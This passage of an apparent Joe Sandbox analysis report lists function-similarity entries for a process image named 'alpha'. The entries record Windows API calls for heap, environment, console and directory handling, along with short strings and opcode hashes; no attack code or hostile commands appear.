                                                                    • Instruction ID: 2f9fd9e65d6f1ffd1c6ea6deed42bc6656d1f1383632a61583b9972218c962d2
                                                                    • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                    • Instruction Fuzzy Hash: AF115432604F418AEB00EF74E85426873B5F71976CF801A31EA6D47754EF3CD5698360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: iswdigit
                                                                    • String ID: GeToken: (%x) '%s'
                                                                    • API String ID: 3849470556-1994581435
                                                                    • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                    • Instruction ID: 54095941a440b39d883869965bb2fed6aedea21e7f62f8763a8c2d938cb631a5
                                                                    • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                    • Instruction Fuzzy Hash: 76515931A08E4285EB25AF56A844179B7B2BB54B68F808435DA4D43394EF7CF89AC730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectorytowupper
                                                                    • String ID: :$:
                                                                    • API String ID: 238703822-3780739392
                                                                    • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                    • Instruction ID: ed655146d95a9de663d7605671bf5cf1d5610ee3ab89ade5f70666753523c257
                                                                    • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                    • Instruction Fuzzy Hash: CD113462608A41C5EB29AF21A804239F6F2EF49BADF859032DD0D07790DF3CD40B8734
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$CurrentDirectorytowupper
                                                                    • String ID:
                                                                    • API String ID: 1403193329-0
                                                                    • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                    • Instruction ID: 88171c755baa501a8c79793712171734310d4cf861c421a91f794d1a4a26c21e
                                                                    • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                    • Instruction Fuzzy Hash: 4451A726A05E8185EB29EF21D9006B9B7B2FF547ACF858535CA0D07694EF3CD54E8730
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_setjmp
                                                                    • String ID:
                                                                    • API String ID: 3883041866-0
                                                                    • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                    • Instruction ID: 132074816384a7ebe5e0b991cb73deeac857b03c4a670cf353b84469d1e3f2cc
                                                                    • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                    • Instruction Fuzzy Hash: 65512E32A08B868AEB61DF21D8503E9B7B5EB49758F804135DA4D87A48DF3CD64AC720
                                                                    APIs
                                                                      • Part of subcall function 00007FF7196733A8: iswspace.MSVCRT(?,?,00000000,00007FF71968D6EE,?,?,?,00007FF719680632), ref: 00007FF7196733C0
                                                                    • iswspace.MSVCRT(?,?,?,00007FF7196732A4), ref: 00007FF71967331C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: iswspace
                                                                    • String ID: off
                                                                    • API String ID: 2389812497-733764931
                                                                    • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                    • Instruction ID: f8c21433a2b98cd765e7bff343717dc05620df86762fa3272aaf68edb3a5631a
                                                                    • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                    • Instruction Fuzzy Hash: 23219021E0CE8385FA787F15B452679E6B2EF45BB8FC88035D90E47694DE2CE44A8331
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$Heapiswspace$AllocProcess
                                                                    • String ID: %s=%s$DPATH$PATH
                                                                    • API String ID: 3731854180-3148396303
                                                                    • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                    • Instruction ID: f79ff0a9d6b4ccee6de55c743b1c080414588b2233effb9c51f6419fd591fa8d
                                                                    • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                    • Instruction Fuzzy Hash: 8F21BB21B09F5286EE18AF55E441279E3B2AF84FA8FC84035CD0E47394DE2CE44A8370
                                                                    APIs
                                                                      • Part of subcall function 00007FF719673C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF719673D0C
                                                                      • Part of subcall function 00007FF719673C24: towupper.MSVCRT ref: 00007FF719673D2F
                                                                      • Part of subcall function 00007FF719673C24: iswalpha.MSVCRT ref: 00007FF719673D4F
                                                                      • Part of subcall function 00007FF719673C24: towupper.MSVCRT ref: 00007FF719673D75
                                                                      • Part of subcall function 00007FF719673C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF719673DBF
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71968EA0F,?,?,?,00007FF71968E925,?,?,?,?,00007FF71966B9B1), ref: 00007FF719666ABF
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF719666AD3
                                                                      • Part of subcall function 00007FF719666B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF719666AE8,?,?,?,00007FF71968EA0F,?,?,?,00007FF71968E925), ref: 00007FF719666B8B
                                                                      • Part of subcall function 00007FF719666B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF719666AE8,?,?,?,00007FF71968EA0F,?,?,?,00007FF71968E925), ref: 00007FF719666B97
                                                                      • Part of subcall function 00007FF719666B84: RtlFreeHeap.NTDLL ref: 00007FF719666BAF
                                                                      • Part of subcall function 00007FF719666B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719666AF1,?,?,?,00007FF71968EA0F,?,?,?,00007FF71968E925), ref: 00007FF719666B39
                                                                      • Part of subcall function 00007FF719666B30: RtlFreeHeap.NTDLL ref: 00007FF719666B4D
                                                                      • Part of subcall function 00007FF719666B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719666AF1,?,?,?,00007FF71968EA0F,?,?,?,00007FF71968E925), ref: 00007FF719666B59
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71968EA0F,?,?,?,00007FF71968E925,?,?,?,?,00007FF71966B9B1), ref: 00007FF719666B03
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF719666B17
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                    • String ID:
                                                                    • API String ID: 3512109576-0
                                                                    • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                    • Instruction ID: 461c3cf642356d3b8283bb818d5b223bfd093a3d7949af40759b5f0080e2f705
                                                                    • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                    • Instruction Fuzzy Hash: E4217161A09E82C5EB04FF65E4142B8BBB2EB59B59F944035CA0E07351DF2C984B8370
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966AF82), ref: 00007FF71966B6D0
                                                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966AF82), ref: 00007FF71966B6E7
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966AF82), ref: 00007FF71966B701
                                                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966AF82), ref: 00007FF71966B715
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocSize
                                                                    • String ID:
                                                                    • API String ID: 2549470565-0
                                                                    • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                    • Instruction ID: 5c778dcaafdac7ffc9f25298221aa6bf97a2dc2a779a1fa3bfd7e90f8cf99891
                                                                    • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                    • Instruction Fuzzy Hash: C7210625909F42C6EA14AF25E45007CEAB2FB44BA8BC89431DA0E03754DF3CE54B8730
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF719685433,?,?,?,00007FF7196869B8,?,?,?,?,?,00007FF719678C39), ref: 00007FF7196856C5
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF7196856D9
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF719685433,?,?,?,00007FF7196869B8,?,?,?,?,?,00007FF719678C39), ref: 00007FF7196856FD
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF719685711
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess
                                                                    • String ID:
                                                                    • API String ID: 3859560861-0
                                                                    • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                    • Instruction ID: eb039724fa13e273c60be5bd2739e7eb21d991b7fe18d0d2e4e8e8a7a38f0a1a
                                                                    • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                    • Instruction Fuzzy Hash: AC112872A04F81CADB009F56E5040ACBBB1F749F94B889165DB4E03718DF38E49AC754
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719668798), ref: 00007FF719674AD6
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719668798), ref: 00007FF719674AEF
                                                                      • Part of subcall function 00007FF719674A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A28
                                                                      • Part of subcall function 00007FF719674A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A66
                                                                      • Part of subcall function 00007FF719674A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A7D
                                                                      • Part of subcall function 00007FF719674A14: memmove.MSVCRT(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A9A
                                                                      • Part of subcall function 00007FF719674A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674AA2
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719668798), ref: 00007FF71967EE64
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF71967EE78
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                    • String ID:
                                                                    • API String ID: 2759988882-0
                                                                    • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                    • Instruction ID: 51fa0da03e6b8101dccaf09e4e4333aea77e9b785c44fe339de658af47fe5a4a
                                                                    • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                    • Instruction Fuzzy Hash: 2EF0F461A15F428AEB156F659404578E9F3FF4EB55BC89474CD0E46350FE3CA44E8730
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleMode_get_osfhandle
                                                                    • String ID:
                                                                    • API String ID: 1606018815-0
                                                                    • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                    • Instruction ID: 62f7212c6c05d0c6630d81af521a55f40d828e0830d20cb3967472c3fe37179c
                                                                    • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                    • Instruction Fuzzy Hash: 7AF0F831A24E42CBD6046F10E444679FA71FB8AB16F84A264DA0A02394DF3CD00A8B60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleTitle
                                                                    • String ID: -
                                                                    • API String ID: 3358957663-3695764949
                                                                    • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                    • Instruction ID: 1b15b64128411aa43631b05a7d3025d8931a265a9cd5a37aabb9bea8ee504f8d
                                                                    • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                    • Instruction Fuzzy Hash: D9317021E08E4296EA14BF11A410078EBB6BB89FB8F955135DE0E07799DF3CE44AC374
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsnicmpswscanf
                                                                    • String ID: :EOF
                                                                    • API String ID: 1534968528-551370653
                                                                    • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                    • Instruction ID: 24982b51ea495227032aa5036285024e5ef949bf33ba12e8ab1c1d978f3ec61b
                                                                    • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                    • Instruction Fuzzy Hash: D6316C31A09E4286FA18AF15A8402B8F2B2EF45B78FC44131EA4D06295DF2CE94BC670
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 3$3
                                                                    • API String ID: 0-2538865259
                                                                    • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                    • Instruction ID: c84593214257da9c0c78b3f7993648304fe906499a0e274d17b7a204cb808c3d
                                                                    • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                    • Instruction Fuzzy Hash: 38012731E0ED829AF314BF619984278BA72BB40B3DFD44136C50E455A2DF2C688F8671
                                                                    APIs
